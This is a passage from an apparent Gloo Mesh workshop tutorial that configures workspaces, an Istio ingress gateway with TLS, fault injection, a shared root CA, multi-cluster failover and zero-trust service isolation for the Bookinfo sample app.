allow_ingress: "true"
resources:
- kind: SERVICE
- kind: ALL
labels:
expose: "true"
exportTo:
- workspaces:
- selector:
allow_ingress: "true"
resources:
- kind: SERVICE
EOF
The Gateway team has decided to import the following from the workspaces that have the label allow_ingress set to true (using a selector):
- all the Kubernetes services exported by these workspaces
- all the resources (RouteTables, VirtualDestination, ...) exported by these workspaces that have the label expose set to true
We're going to create a workspace for the team in charge of the Bookinfo application.
The platform team needs to create the corresponding Workspace
Kubernetes objects in the Gloo Mesh management cluster.
Let's create the bookinfo
workspace which corresponds to the bookinfo-frontends
and bookinfo-backends
namespaces on the cluster(s):
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: Workspace
metadata:
name: bookinfo
namespace: gloo-mesh
labels:
allow_ingress: "true"
spec:
workloadClusters:
- name: cluster1
namespaces:
- name: bookinfo-frontends
- name: bookinfo-backends
- name: cluster2
namespaces:
- name: bookinfo-frontends
- name: bookinfo-backends
EOF
Then, the Bookinfo team creates a WorkspaceSettings
Kubernetes object in one of the namespaces of the bookinfo
workspace (so the bookinfo-frontends
or the bookinfo-backends
namespace):
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: bookinfo
namespace: bookinfo-frontends
spec:
importFrom:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
exportTo:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
labels:
app: productpage
- kind: SERVICE
labels:
app: reviews
- kind: ALL
labels:
expose: "true"
EOF
The Bookinfo team has decided to export the following to the gateways workspace (using a reference):
- the productpage and the reviews Kubernetes services
- all the resources (RouteTables, VirtualDestination, ...) that have the label expose set to true
This is how the environment looks with the workspaces:
In this step, we're going to expose the productpage
service through the Ingress Gateway using Gloo Mesh.
The Gateway team must create a VirtualGateway
to configure the Istio Ingress Gateway in cluster1 to listen to incoming requests.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualGateway
metadata:
name: north-south-gw
namespace: istio-gateways
spec:
workloads:
- selector:
labels:
istio: ingressgateway
cluster: cluster1
listeners:
- http: {}
port:
number: 80
allowedRouteTables:
- host: '*'
EOF
Then, the Gateway team should create a parent RouteTable
to configure the main routing.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: main
namespace: istio-gateways
spec:
hosts:
- '*'
virtualGateways:
- name: north-south-gw
namespace: istio-gateways
cluster: cluster1
workloadSelectors: []
http:
- name: root
matchers:
- uri:
prefix: /
delegate:
routeTables:
- labels:
expose: "true"
EOF
In this example, you can see that the Gateway team is delegating the routing details to the bookinfo
and httpbin
workspaces. The teams in charge of these workspaces can expose their services through the gateway.
The Gateway team can use this main RouteTable
to enforce a global WAF policy, but also to have control on which hostnames and paths can be used by each application team.
Then, the Bookinfo team can create a RouteTable
to determine how they want to handle the traffic.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
spec:
http:
- name: productpage
matchers:
- uri:
exact: /productpage
- uri:
prefix: /static
- uri:
exact: /login
- uri:
exact: /logout
- uri:
prefix: /api/v1/products
forwardTo:
destinations:
- ref:
name: productpage
namespace: bookinfo-frontends
port:
number: 9080
EOF
You should now be able to access the productpage
application through the browser.
Get the URL to access the productpage
service using the following command:
echo "http://${ENDPOINT_HTTP_GW_CLUSTER1}/productpage"
Gloo Mesh translates the VirtualGateway
and RouteTable
into the corresponding Istio objects (Gateway
and VirtualService
).
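If you're curious, you can look at the generated Istio objects; they should be created in the istio-gateways namespace (the namespace is an assumption based on where the VirtualGateway and the parent RouteTable live):
kubectl --context ${CLUSTER1} -n istio-gateways get gateways.networking.istio.io,virtualservices.networking.istio.io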
Now, let's secure the access through TLS.
Let's first create a private key and a self-signed certificate:
openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout tls.key -out tls.crt -subj "/CN=*"
Then, you have to store them in Kubernetes secrets by running the following commands:
kubectl --context ${CLUSTER1} -n istio-gateways create secret generic tls-secret \
--from-file=tls.key=tls.key \
--from-file=tls.crt=tls.crt
kubectl --context ${CLUSTER2} -n istio-gateways create secret generic tls-secret \
--from-file=tls.key=tls.key \
--from-file=tls.crt=tls.crt
Finally, the Gateway team needs to update the VirtualGateway
to use this secret:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualGateway
metadata:
name: north-south-gw
namespace: istio-gateways
spec:
workloads:
- selector:
labels:
istio: ingressgateway
cluster: cluster1
listeners:
- http: {}
port:
number: 80
# ---------------- Redirect to https --------------------
httpsRedirect: true
# -------------------------------------------------------
- http: {}
# ---------------- SSL config ---------------------------
port:
number: 443
tls:
mode: SIMPLE
secretName: tls-secret
# -------------------------------------------------------
allowedRouteTables:
- host: '*'
EOF
You can now access the productpage
application securely through the browser.
Get the URL to access the productpage
service using the following command:
echo "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/productpage"
This diagram shows the flow of the request (through the Istio Ingress Gateway):
We're going to use Gloo Mesh policies to inject faults and configure timeouts.
Let's create the following FaultInjectionPolicy
to inject a delay when the v2
version of the reviews
service talks to the ratings
service:
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: resilience.policy.gloo.solo.io/v2
kind: FaultInjectionPolicy
metadata:
name: ratings-fault-injection
namespace: bookinfo-backends
spec:
applyToRoutes:
- route:
labels:
fault_injection: "true"
config:
delay:
fixedDelay: 2s
percentage: 100
EOF
As you can see, it will be applied to all the routes that have the label fault_injection
set to "true"
.
So, you need to create a RouteTable
with this label set in the corresponding route.
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: ratings
namespace: bookinfo-backends
spec:
hosts:
- 'ratings.bookinfo-backends.svc.cluster.local'
workloadSelectors:
- selector:
labels:
app: reviews
http:
- name: ratings
labels:
fault_injection: "true"
matchers:
- uri:
prefix: /
forwardTo:
destinations:
- ref:
name: ratings
namespace: bookinfo-backends
port:
number: 9080
EOF
If you refresh the webpage, you should see that it takes longer to get the productpage
loaded when version v2
of the reviews
service is called.
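You can also measure the effect from the command line; the requests served by the v2 version of the reviews service should take roughly two seconds longer (a rough sketch, numbers will vary):
for i in $(seq 1 6); do curl -k -s -o /dev/null -w "%{time_total}\n" "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/productpage"; done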
Now, let's configure a 0.5s request timeout when the productpage
service calls the reviews
service on cluster1.
You need to create the following RetryTimeoutPolicy
:
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: resilience.policy.gloo.solo.io/v2
kind: RetryTimeoutPolicy
metadata:
name: reviews-request-timeout
namespace: bookinfo-backends
spec:
applyToRoutes:
- route:
labels:
request_timeout: "0.5s"
config:
requestTimeout: 0.5s
EOF
As you can see, it will be applied to all the routes that have the label request_timeout
set to "0.5s"
.
Then, you need to create a RouteTable
with this label set in the corresponding route.
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: reviews
namespace: bookinfo-backends
spec:
hosts:
- 'reviews.bookinfo-backends.svc.cluster.local'
workloadSelectors:
- selector:
labels:
app: productpage
http:
- name: reviews
labels:
request_timeout: "0.5s"
matchers:
- uri:
prefix: /
forwardTo:
destinations:
- ref:
name: reviews
namespace: bookinfo-backends
port:
number: 9080
subset:
version: v2
EOF
If you refresh the page several times, you'll see an error message saying that the reviews are unavailable when the productpage tries to communicate with the v2 version of the reviews service.
This diagram shows where the timeout and delay have been applied:
Let's delete the Gloo Mesh objects we've created:
kubectl --context ${CLUSTER1} -n bookinfo-backends delete faultinjectionpolicy ratings-fault-injection
kubectl --context ${CLUSTER1} -n bookinfo-backends delete routetable ratings
kubectl --context ${CLUSTER1} -n bookinfo-backends delete retrytimeoutpolicy reviews-request-timeout
kubectl --context ${CLUSTER1} -n bookinfo-backends delete routetable reviews
To allow secured (end-to-end mTLS) cross-cluster communications, we need to make sure the certificates issued by the Istio control plane on each cluster are signed with intermediate certificates which have a common root CA.
Gloo Mesh fully automates this process.
Run this command to see how the communication between microservices occurs currently:
kubectl --context ${CLUSTER1} exec -t -n bookinfo-backends deploy/reviews-v1 \
-- openssl s_client -showcerts -connect ratings:9080 -alpn istio
The output should look like this:
...
Certificate chain
0 s:
i:O = cluster1
-----BEGIN CERTIFICATE-----
MIIDFzCCAf+gAwIBAgIRALsoWlroVcCc1n+VROhATrcwDQYJKoZIhvcNAQELBQAw
...
BPiAYRMH5j0gyBqiZZEwCfzfQe1e6aAgie9T
-----END CERTIFICATE-----
1 s:O = cluster1
i:O = cluster1
-----BEGIN CERTIFICATE-----
MIICzjCCAbagAwIBAgIRAKIx2hzMbAYzM74OC4Lj1FUwDQYJKoZIhvcNAQELBQAw
...
uMTPjt7p/sv74fsLgrx8WMI0pVQ7+2plpjaiIZ8KvEK9ye/0Mx8uyzTG7bpmVVWo
ugY=
-----END CERTIFICATE-----
...
Now, run the same command on the second cluster:
kubectl --context ${CLUSTER2} exec -t -n bookinfo-backends deploy/reviews-v1 \
-- openssl s_client -showcerts -connect ratings:9080 -alpn istio
The output should look like this:
...
Certificate chain
0 s:
i:O = cluster2
-----BEGIN CERTIFICATE-----
MIIDFzCCAf+gAwIBAgIRALo1dmnbbP0hs1G82iBa2oAwDQYJKoZIhvcNAQELBQAw
...
YvDrZfKNOKwFWKMKKhCSi2rmCvLKuXXQJGhy
-----END CERTIFICATE-----
1 s:O = cluster2
i:O = cluster2
-----BEGIN CERTIFICATE-----
MIICzjCCAbagAwIBAgIRAIjegnzq/hN/NbMm3dmllnYwDQYJKoZIhvcNAQELBQAw
...
GZRM4zV9BopZg745Tdk2LVoHiBR536QxQv/0h1P0CdN9hNLklAhGN/Yf9SbDgLTw
6Sk=
-----END CERTIFICATE-----
...
The first certificate in the chain is the certificate of the workload and the second one is the Istio CA’s signing (CA) certificate.
As you can see, the Istio CA’s signing (CA) certificates are different in the 2 clusters, so one cluster can't validate certificates issued by the other cluster.
Creating a Root Trust Policy will unify these two CAs with a common root identity.
Run the following command to create the Root Trust Policy:
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: RootTrustPolicy
metadata:
name: root-trust-policy
namespace: gloo-mesh
spec:
config:
mgmtServerCa:
generated: {}
autoRestartPods: true # Restarting pods automatically is NOT RECOMMENDED in Production
EOF
When we create the RootTrustPolicy, Gloo Mesh will kick off the process of unifying identities under a shared root.
First, Gloo Mesh will create the Root certificate.
Then, Gloo Mesh will use the Gloo Mesh Agent on each of the clusters to create a new key/cert pair that will form an intermediate CA used by the mesh on that cluster. It will then create a Certificate Request (CR).
Gloo Mesh will then sign the intermediate certificates with the Root certificate.
At that point, we want Istio to pick up the new intermediate CA and start using that for its workloads. To do that Gloo Mesh creates a Kubernetes secret called cacerts
in the istio-system
namespace.
You can have a look at the Istio documentation here if you want to get more information about this process.
Check that the secret containing the new Istio CA has been created in the istio-system namespace on the first cluster:
kubectl --context ${CLUSTER1} get secret -n istio-system cacerts -o yaml
Here is the expected output:
apiVersion: v1
data:
ca-cert.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZFRENDQXZpZ0F3SUJBZ0lRUG5kRDkwejN4dytYeTBzYzNmcjRmekFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
jFWVlZtSWl3Si8va0NnNGVzWTkvZXdxSGlTMFByWDJmSDVDCmhrWnQ4dz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
ca-key.pem: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlKS0FJQkFBS0NBZ0VBczh6U0ZWcEFxeVNodXpMaHVXUlNFMEJJMXVwbnNBc3VnNjE2TzlKdzBlTmhhc3RtClUvZERZS...
DT2t1bzBhdTFhb1VsS1NucldpL3kyYUtKbz0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K
cert-chain.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZFRENDQXZpZ0F3SUJBZ0lRUG5kRDkwejN4dytYeTBzYzNmcjRmekFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
RBTHpzQUp2ZzFLRUR4T2QwT1JHZFhFbU9CZDBVUDk0KzJCN0tjM2tkNwpzNHYycEV2YVlnPT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
key.pem: ""
root-cert.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUU0ekNDQXN1Z0F3SUJBZ0lRT2lZbXFGdTF6Q3NzR0RFQ3JOdnBMakFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
UNBVEUtLS0tLQo=
kind: Secret
metadata:
labels:
context.mesh.gloo.solo.io/cluster: cluster1
context.mesh.gloo.solo.io/namespace: istio-system
gloo.solo.io/parent_cluster: cluster1
gloo.solo.io/parent_group: internal.gloo.solo.io
gloo.solo.io/parent_kind: IssuedCertificate
gloo.solo.io/parent_name: istiod-1-12-istio-system-cluster1
gloo.solo.io/parent_namespace: istio-system
gloo.solo.io/parent_version: v2
reconciler.mesh.gloo.solo.io/name: cert-agent
name: cacerts
namespace: istio-system
type: certificates.mesh.gloo.solo.io/issued_certificate
Same operation on the second cluster:
kubectl --context ${CLUSTER2} get secret -n istio-system cacerts -o yaml
Here is the expected output:
apiVersion: v1
data:
ca-cert.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZFRENDQXZpZ0F3SUJBZ0lRWXE1V29iWFhGM1gwTjlNL3BYYkNKekFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
XpqQ1RtK2QwNm9YaDI2d1JPSjdQTlNJOTkrR29KUHEraXltCkZIekhVdz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
ca-key.pem: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlKS1FJQkFBS0NBZ0VBMGJPMTdSRklNTnh4K1lMUkEwcFJqRmRvbG1SdW9Oc3gxNUUvb3BMQ1l1RjFwUEptCndhR1U1V...
MNU9JWk5ObDA4dUE1aE1Ca2gxNCtPKy9HMkoKLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K
cert-chain.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUZFRENDQXZpZ0F3SUJBZ0lRWXE1V29iWFhGM1gwTjlNL3BYYkNKekFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
RBTHpzQUp2ZzFLRUR4T2QwT1JHZFhFbU9CZDBVUDk0KzJCN0tjM2tkNwpzNHYycEV2YVlnPT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
key.pem: ""
root-cert.pem: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUU0ekNDQXN1Z0F3SUJBZ0lRT2lZbXFGdTF6Q3NzR0RFQ3JOdnBMakFOQmdrcWhraUc5dzBCQVFzRkFEQWIKTVJrd0Z3WURWU...
UNBVEUtLS0tLQo=
kind: Secret
metadata:
labels:
context.mesh.gloo.solo.io/cluster: cluster2
context.mesh.gloo.solo.io/namespace: istio-system
gloo.solo.io/parent_cluster: cluster2
gloo.solo.io/parent_group: internal.gloo.solo.io
gloo.solo.io/parent_kind: IssuedCertificate
gloo.solo.io/parent_name: istiod-1-12-istio-system-cluster2
gloo.solo.io/parent_namespace: istio-system
gloo.solo.io/parent_version: v2
reconciler.mesh.gloo.solo.io/name: cert-agent
name: cacerts
namespace: istio-system
type: certificates.mesh.gloo.solo.io/issued_certificate
As you can see, the secrets contain the same Root CA (base64 encoded), but different intermediate certs.
Have a look at the RootTrustPolicy
object we've just created and notice the autoRestartPods: true
in the config
. This instructs Gloo Mesh to restart all the Pods in the mesh.
In recent versions of Istio, the control plane is able to pick up this new cert without any restart, but we would need to wait for the different Pods to renew their certificates (which happens every hour by default).
Now, let's check what certificates we get when we run the same commands we ran before we created the Root Trust Policy:
kubectl --context ${CLUSTER1} exec -t -n bookinfo-backends deploy/reviews-v1 \
-- openssl s_client -showcerts -connect ratings:9080 -alpn istio
The output should look like this:
...
Certificate chain
0 s:
i:
-----BEGIN CERTIFICATE-----
MIIEBzCCAe+gAwIBAgIRAK1yjsFkisSjNqm5tzmKQS8wDQYJKoZIhvcNAQELBQAw
...
T77lFKXx0eGtDNtWm/1IPiOutIMlFz/olVuN
-----END CERTIFICATE-----
1 s:
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIFEDCCAvigAwIBAgIQPndD90z3xw+Xy0sc3fr4fzANBgkqhkiG9w0BAQsFADAb
...
hkZt8w==
-----END CERTIFICATE-----
2 s:O = gloo-mesh
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIE4zCCAsugAwIBAgIQOiYmqFu1zCssGDECrNvpLjANBgkqhkiG9w0BAQsFADAb
...
s4v2pEvaYg==
-----END CERTIFICATE-----
3 s:O = gloo-mesh
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIE4zCCAsugAwIBAgIQOiYmqFu1zCssGDECrNvpLjANBgkqhkiG9w0BAQsFADAb
...
s4v2pEvaYg==
-----END CERTIFICATE-----
...
And let's compare with what we get on the second cluster:
kubectl --context ${CLUSTER2} exec -t -n bookinfo-backends deploy/reviews-v1 \
-- openssl s_client -showcerts -connect ratings:9080 -alpn istio
The output should look like this:
...
Certificate chain
0 s:
i:
-----BEGIN CERTIFICATE-----
MIIEBjCCAe6gAwIBAgIQfSeujXiz3KsbG01+zEcXGjANBgkqhkiG9w0BAQsFADAA
...
EtTlhPLbyf2GwkUgzXhdcu2G8uf6o16b0qU=
-----END CERTIFICATE-----
1 s:
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIFEDCCAvigAwIBAgIQYq5WobXXF3X0N9M/pXbCJzANBgkqhkiG9w0BAQsFADAb
...
FHzHUw==
-----END CERTIFICATE-----
2 s:O = gloo-mesh
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIE4zCCAsugAwIBAgIQOiYmqFu1zCssGDECrNvpLjANBgkqhkiG9w0BAQsFADAb
...
s4v2pEvaYg==
-----END CERTIFICATE-----
3 s:O = gloo-mesh
i:O = gloo-mesh
-----BEGIN CERTIFICATE-----
MIIE4zCCAsugAwIBAgIQOiYmqFu1zCssGDECrNvpLjANBgkqhkiG9w0BAQsFADAb
...
s4v2pEvaYg==
-----END CERTIFICATE-----
...
You can see that the last certificate in the chain is now identical on both clusters. It's the new root certificate.
The first certificate is the certificate of the service. Let's decode it.
Copy and paste the content of the certificate (including the BEGIN and END CERTIFICATE lines) in a new file called /tmp/cert
and run the following command:
openssl x509 -in /tmp/cert -text
The output should be as follows:
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
7d:27:ae:8d:78:b3:dc:ab:1b:1b:4d:7e:cc:47:17:1a
Signature Algorithm: sha256WithRSAEncryption
Issuer:
Validity
Not Before: Sep 17 08:21:08 2020 GMT
Not After : Sep 18 08:21:08 2020 GMT
Subject:
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
...
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name: critical
URI:spiffe://cluster2/ns/bookinfo-backends/sa/bookinfo-ratings
Signature Algorithm: sha256WithRSAEncryption
...
-----BEGIN CERTIFICATE-----
MIIEBjCCAe6gAwIBAgIQfSeujXiz3KsbG01+zEcXGjANBgkqhkiG9w0BAQsFADAA
...
EtTlhPLbyf2GwkUgzXhdcu2G8uf6o16b0qU=
-----END CERTIFICATE-----
The Subject Alternative Name (SAN) is the most interesting part. It allows the sidecar proxy of the reviews
service to validate that it talks to the sidecar proxy of the ratings
service.
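With a recent OpenSSL (1.1.1 or newer), you can print just the SAN instead of the full text dump:
openssl x509 -in /tmp/cert -noout -ext subjectAltName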
We also need to make sure we restart our in-mesh
deployment because it's not yet part of a Workspace
:
kubectl --context ${CLUSTER1} -n httpbin rollout restart deploy/in-mesh
Right now, we've only exposed the productpage
service on the first cluster.
In this lab, we're going to make it available on both clusters.
Let's update the VirtualGateway to expose it on both clusters.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualGateway
metadata:
name: north-south-gw
namespace: istio-gateways
spec:
workloads:
- selector:
labels:
istio: ingressgateway
listeners:
- http: {}
port:
number: 80
httpsRedirect: true
- http: {}
port:
number: 443
tls:
mode: SIMPLE
secretName: tls-secret
allowedRouteTables:
- host: '*'
EOF
Then, we can configure the RouteTable
to send the traffic to a Virtual Destination which will be composed of the productpage
services running in both clusters.
Let's create this Virtual Destination.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualDestination
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
spec:
hosts:
- productpage.global
services:
- namespace: bookinfo-frontends
labels:
app: productpage
ports:
- number: 9080
protocol: HTTP
EOF
Note that we have added the label expose with the value true to make sure it will be exported to the gateways workspace.
After that, we need to update the RouteTable
to use it.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
spec:
http:
- name: productpage
matchers:
- uri:
exact: /productpage
- uri:
prefix: /static
- uri:
exact: /login
- uri:
exact: /logout
- uri:
prefix: /api/v1/products
forwardTo:
destinations:
- ref:
name: productpage
namespace: bookinfo-frontends
kind: VIRTUAL_DESTINATION
port:
number: 9080
EOF
You can now access the productpage
service using the gateway of the second cluster.
Get the URL to access the productpage
service from the second cluster using the following command:
echo "https://${ENDPOINT_HTTPS_GW_CLUSTER2}/productpage"
Now, if you try to access it from the first cluster, you can see that you now get the v3
version of the reviews
service (red stars).
This diagram shows the flow of the request (through both Istio ingress gateways):
It's nice, but you generally want to direct the traffic to the local services if they're available and fail over to the remote cluster only when they're not.
In order to do that, we need to create two other policies.
The first one is a FailoverPolicy
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: resilience.policy.gloo.solo.io/v2
kind: FailoverPolicy
metadata:
name: failover
namespace: bookinfo-frontends
spec:
applyToDestinations:
- kind: VIRTUAL_DESTINATION
selector:
labels:
failover: "true"
config:
localityMappings: []
EOF
It will update the Istio DestinationRule
to enable failover.
Note that failover is enabled by default, so creating this FailoverPolicy
is optional. By default, it will try to failover to the same zone, then same region and finally anywhere. A FailoverPolicy
is generally used when you want to change this default behavior. For example, if you have many regions, you may want to failover only to a specific region.
The second one is an OutlierDetectionPolicy
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: resilience.policy.gloo.solo.io/v2
kind: OutlierDetectionPolicy
metadata:
name: outlier-detection
namespace: bookinfo-frontends
spec:
applyToDestinations:
- kind: VIRTUAL_DESTINATION
selector:
labels:
failover: "true"
config:
consecutiveErrors: 2
interval: 5s
baseEjectionTime: 30s
maxEjectionPercent: 100
EOF
It will update the Istio DestinationRule
to specify how/when we want the failover to happen.
As you can see, both policies will be applied to VirtualDestination
objects that have the label failover
set to "true"
.
So we need to update the VirtualDestination
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: VirtualDestination
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
failover: "true"
spec:
hosts:
- productpage.global
services:
- namespace: bookinfo-frontends
labels:
app: productpage
ports:
- number: 9080
protocol: HTTP
EOF
Now, if you try to access the productpage from the first cluster, you should only get the v1
and v2
versions (the local ones).
This updated diagram shows the flow of the requests using the local services:
If the productpage
service doesn't exist on the first cluster, the Istio Ingress Gateway of this cluster will automatically use the productpage
service running on the other cluster.
Let's try this:
kubectl --context ${CLUSTER1} -n bookinfo-frontends scale deploy/productpage-v1 --replicas=0
kubectl --context ${CLUSTER1} -n bookinfo-frontends wait --for=jsonpath='{.spec.replicas}'=0 deploy/productpage-v1
You can still access the application on cluster1 even if the productpage isn't running there anymore. And you can see the v3
version of the reviews
service (red stars).
This updated diagram shows the flow of the request now that the productpage
service isn't running in the first cluster:
Let's restart the productpage
service:
kubectl --context ${CLUSTER1} -n bookinfo-frontends scale deploy/productpage-v1 --replicas=1
kubectl --context ${CLUSTER1} -n bookinfo-frontends wait --for=jsonpath='{.status.readyReplicas}'=1 deploy/productpage-v1
But what happens if the productpage
service is running, but is unavailable?
Let's try!
The following command will patch the deployment to run a new version which won't respond to the incoming requests.
kubectl --context ${CLUSTER1} -n bookinfo-frontends patch deploy productpage-v1 --patch '{"spec": {"template": {"spec": {"containers": [{"name": "productpage","command": ["sleep", "20h"]}]}}}}'
kubectl --context ${CLUSTER1} -n bookinfo-frontends rollout status deploy/productpage-v1
You can still access the bookinfo application.
This updated diagram shows the flow of the request now that the productpage
service isn't available in the first cluster:
Run the following command to make the productpage
available again in the first cluster:
kubectl --context ${CLUSTER1} -n bookinfo-frontends patch deployment productpage-v1 --type json -p '[{"op": "remove", "path": "/spec/template/spec/containers/0/command"}]'
kubectl --context ${CLUSTER1} -n bookinfo-frontends rollout status deploy/productpage-v1
Let's apply the original RouteTable
yaml:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: productpage
namespace: bookinfo-frontends
labels:
expose: "true"
spec:
http:
- name: productpage
matchers:
- uri:
exact: /productpage
- uri:
prefix: /static
- uri:
exact: /login
- uri:
exact: /logout
- uri:
prefix: /api/v1/products
forwardTo:
destinations:
- ref:
name: productpage
namespace: bookinfo-frontends
port:
number: 9080
EOF
And also delete the different objects we've created:
kubectl --context ${CLUSTER1} -n bookinfo-frontends delete virtualdestination productpage
kubectl --context ${CLUSTER1} -n bookinfo-frontends delete failoverpolicy failover
kubectl --context ${CLUSTER1} -n bookinfo-frontends delete outlierdetectionpolicy outlier-detection
In the previous step, we federated multiple meshes and established a shared root CA for a shared identity domain.
All the communications between Pods in the mesh are now encrypted by default, but:
- communications between services that are in the mesh and others which aren't in the mesh are still allowed and not encrypted
- all the services can talk together
Let's validate this.
Run the following commands to initiate a communication from a service which isn't in the mesh to a service which is in the mesh:
pod=$(kubectl --context ${CLUSTER1} -n httpbin get pods -l app=not-in-mesh -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n httpbin debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://reviews.bookinfo-backends.svc.cluster.local:9080/reviews/0
You should get a `200` response code, which confirms that the communication is currently allowed.
Run the following commands to initiate a communication from a service which is in the mesh to another service which is in the mesh:
pod=$(kubectl --context ${CLUSTER1} -n httpbin get pods -l app=in-mesh -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n httpbin debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://reviews.bookinfo-backends.svc.cluster.local:9080/reviews/0
You should get a `200` response code again.
To enforce a zero trust policy, this shouldn't be the case.
We'll leverage the Gloo Mesh workspaces to get to a state where:
- communications between services which are in the mesh and others which aren't in the mesh aren't allowed anymore
- communications between services in the mesh are allowed only when services are in the same workspace or when their workspaces have import/export rules.
The Bookinfo team must update its `WorkspaceSettings` Kubernetes object to enable service isolation.
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: bookinfo
namespace: bookinfo-frontends
spec:
importFrom:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
exportTo:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
labels:
app: productpage
- kind: SERVICE
labels:
app: reviews
- kind: ALL
labels:
expose: "true"
options:
serviceIsolation:
enabled: true
trimProxyConfig: true
EOF
When service isolation is enabled, Gloo Mesh creates the corresponding Istio `AuthorizationPolicy` and `PeerAuthentication` objects to enforce zero trust.

When `trimProxyConfig` is set to `true`, Gloo Mesh also creates the corresponding Istio `Sidecar` objects to program the sidecar proxies to only know how to talk to the authorized services.
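If you're curious, you can list the Istio objects Gloo Mesh generated in the Bookinfo namespaces (the exact object names are managed by Gloo Mesh and may differ in your environment):

```bash
kubectl --context ${CLUSTER1} -n bookinfo-frontends get authorizationpolicies,peerauthentications,sidecars
kubectl --context ${CLUSTER1} -n bookinfo-backends get authorizationpolicies,peerauthentications,sidecars
```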
If you refresh the browser, you'll see that the bookinfo application is still exposed and working correctly.
Run the following commands to initiate a communication from a service which isn't in the mesh to a service which is in the mesh:
pod=$(kubectl --context ${CLUSTER1} -n httpbin get pods -l app=not-in-mesh -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n httpbin debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://reviews.bookinfo-backends.svc.cluster.local:9080/reviews/0
You should get a `000` response code, which means that the communication can't be established.
Run the following commands to initiate a communication from a service which is in the mesh to another service which is in the mesh:
